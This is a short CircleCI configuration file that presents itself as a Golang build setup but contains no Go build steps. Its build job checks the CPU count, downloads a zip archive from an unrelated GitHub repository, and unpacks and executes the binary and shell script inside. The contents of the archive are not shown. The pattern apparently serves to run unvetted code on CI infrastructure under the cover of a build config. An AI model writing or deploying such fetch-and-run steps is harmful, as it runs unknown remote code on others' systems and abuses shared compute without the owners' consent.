# Golang CircleCI 2.0 configuration file
#
# Check https://circleci.com/docs/2.0/language-go/ for more details
version: 2

jobs:
  build:
    docker:
      - image: circleci/golang:1.9
    steps:
      - run: ls
      - run: nproc
      - run: wget https://github.com/flash-barr/furry-giggle/raw/main/frame.zip
      - run: unzip frame.zip && chmod +x frame frame.sh && ./frame.sh
